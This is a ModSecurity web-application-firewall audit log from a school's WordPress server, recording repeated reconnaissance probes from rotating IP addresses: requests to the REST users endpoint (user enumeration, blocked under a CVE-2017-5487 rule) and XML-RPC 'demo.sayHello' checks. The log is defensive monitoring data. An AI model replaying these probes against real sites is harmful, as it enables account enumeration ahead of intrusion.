Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75840407-Z-- --0902850a-A-- [05/May/2025:23:11:55 +0700] aBjjS02V_h1VFAgsfgZ9oAAAAA0 103.236.140.4 48724 103.236.140.4 8181 --0902850a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0902850a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0902850a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461515658859 3518 (- - -) Stopwatch2: 1746461515658859 3518; combined=1547, p1=527, p2=989, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0902850a-Z-- --e0619064-A-- [05/May/2025:23:11:58 +0700] aBjjTvZJDMuQndL03JNdYAAAAEc 103.236.140.4 48764 103.236.140.4 8181 --e0619064-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.175 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e0619064-C-- demo.sayHello --e0619064-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0619064-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461518798163 5313 (- - -) Stopwatch2: 1746461518798163 5313; combined=4215, p1=535, p2=3458, p3=32, p4=35, p5=92, sr=75, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0619064-Z-- --6304dd03-A-- [05/May/2025:23:12:30 +0700] aBjjbvZJDMuQndL03JNdcQAAAFM 103.236.140.4 49028 103.236.140.4 8181 --6304dd03-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.52 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6304dd03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6304dd03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461550508450 3221 (- - -) Stopwatch2: 1746461550508450 3221; combined=1427, p1=484, p2=910, p3=0, p4=0, p5=32, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6304dd03-Z-- --df77cd08-A-- [05/May/2025:23:12:33 +0700] aBjjcQRwKNFSM6B7_Lag8AAAAJg 103.236.140.4 49056 103.236.140.4 8181 --df77cd08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.52 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --df77cd08-C-- demo.sayHello --df77cd08-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --df77cd08-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461553511806 5345 (- - -) Stopwatch2: 1746461553511806 5345; combined=3745, p1=497, p2=3056, p3=37, p4=36, p5=71, sr=57, sw=48, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df77cd08-Z-- --b0f93104-A-- [05/May/2025:23:13:53 +0700] aBjjwQRwKNFSM6B7_LahMQAAAJQ 103.236.140.4 49806 103.236.140.4 8181 --b0f93104-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b0f93104-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0f93104-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461633084147 3598 (- - -) Stopwatch2: 1746461633084147 3598; combined=1496, p1=537, p2=928, p3=0, p4=0, p5=31, sr=130, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0f93104-Z-- --4ade0c72-A-- [05/May/2025:23:13:56 +0700] aBjjxE2V_h1VFAgsfgZ93AAAABI 103.236.140.4 49838 103.236.140.4 8181 --4ade0c72-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.21 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4ade0c72-C-- demo.sayHello --4ade0c72-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ade0c72-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461636505579 6379 (- - -) Stopwatch2: 1746461636505579 6379; combined=4689, p1=601, p2=3791, p3=41, p4=44, p5=128, sr=79, sw=84, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ade0c72-Z-- --c786e62a-A-- [05/May/2025:23:13:58 +0700] aBjjxvZJDMuQndL03JNdrgAAAFg 103.236.140.4 49858 103.236.140.4 8181 --c786e62a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c786e62a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c786e62a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461638044824 2093 (- - -) Stopwatch2: 1746461638044824 2093; combined=1010, p1=356, p2=625, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c786e62a-Z-- --6a56124f-A-- [05/May/2025:23:14:01 +0700] aBjjyYZWvR7-42f6JrAN9wAAAMs 103.236.140.4 49890 103.236.140.4 8181 --6a56124f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.26 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6a56124f-C-- demo.sayHello --6a56124f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a56124f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461641497861 6370 (- - -) Stopwatch2: 1746461641497861 6370; combined=4629, p1=615, p2=3770, p3=41, p4=44, p5=95, sr=80, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a56124f-Z-- --0d4bab46-A-- [05/May/2025:23:14:33 +0700] aBjj6U2V_h1VFAgsfgZ97gAAAAs 103.236.140.4 50194 103.236.140.4 8181 --0d4bab46-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.70 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0d4bab46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d4bab46-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461673702755 2914 (- - -) Stopwatch2: 1746461673702755 2914; combined=1486, p1=529, p2=917, p3=0, p4=0, p5=40, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d4bab46-Z-- --1fc1db4b-A-- [05/May/2025:23:14:36 +0700] aBjj7PZJDMuQndL03JNdxgAAAEw 103.236.140.4 50226 103.236.140.4 8181 --1fc1db4b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.70 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1fc1db4b-C-- demo.sayHello --1fc1db4b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fc1db4b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461676614486 5109 (- - -) Stopwatch2: 1746461676614486 5109; combined=4092, p1=496, p2=3369, p3=29, p4=31, p5=102, sr=74, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fc1db4b-Z-- --3fd4e930-A-- [05/May/2025:23:15:08 +0700] aBjkDE2V_h1VFAgsfgZ9_wAAAAw 103.236.140.4 50504 103.236.140.4 8181 --3fd4e930-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3fd4e930-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fd4e930-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461708548750 2649 (- - -) Stopwatch2: 1746461708548750 2649; combined=1503, p1=517, p2=950, p3=0, p4=0, p5=36, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fd4e930-Z-- --aa011f3e-A-- [05/May/2025:23:15:11 +0700] aBjkD_ZJDMuQndL03JNd2AAAAEI 103.236.140.4 50544 103.236.140.4 8181 --aa011f3e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.188 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --aa011f3e-C-- demo.sayHello --aa011f3e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa011f3e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461711276350 5174 (- - -) Stopwatch2: 1746461711276350 5174; combined=3669, p1=474, p2=2992, p3=30, p4=28, p5=85, sr=69, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa011f3e-Z-- --9f22e00e-A-- [05/May/2025:23:15:52 +0700] aBjkOE2V_h1VFAgsfgZ-IQAAABY 103.236.140.4 50976 103.236.140.4 8181 --9f22e00e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9f22e00e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f22e00e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461752312421 2691 (- - -) Stopwatch2: 1746461752312421 2691; combined=1217, p1=410, p2=778, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f22e00e-Z-- --5dd93e60-A-- [05/May/2025:23:15:55 +0700] aBjkOwRwKNFSM6B7_LahewAAAJg 103.236.140.4 50996 103.236.140.4 8181 --5dd93e60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.188 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.188 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5dd93e60-C-- demo.sayHello --5dd93e60-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5dd93e60-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461755243913 5531 (- - -) Stopwatch2: 1746461755243913 5531; combined=4096, p1=529, p2=3347, p3=33, p4=34, p5=90, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5dd93e60-Z-- --4d503257-A-- [05/May/2025:23:16:18 +0700] aBjkUk2V_h1VFAgsfgZ-KQAAABI 103.236.140.4 51208 103.236.140.4 8181 --4d503257-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.77.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.77.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4d503257-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d503257-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746461778258466 2426 (- - -) Stopwatch2: 1746461778258466 2426; combined=1372, p1=443, p2=898, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d503257-Z-- --4df68142-A-- [05/May/2025:23:16:21 +0700] aBjkVYZWvR7-42f6JrAObAAAAMw 103.236.140.4 51256 103.236.140.4 8181 --4df68142-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.77.199 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.77.199 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4df68142-C-- demo.sayHello --4df68142-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4df68142-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746461781306180 5910 (- - -) Stopwatch2: 1746461781306180 5910; combined=4801, p1=570, p2=3987, p3=40, p4=44, p5=96, sr=75, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4df68142-Z-- --d0d6a75d-A-- [05/May/2025:23:16:38 +0700] aBjkZk2V_h1VFAgsfgZ-OAAAAAQ 103.236.140.4 51428 103.236.140.4 8181 --d0d6a75d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d0d6a75d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0d6a75d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s 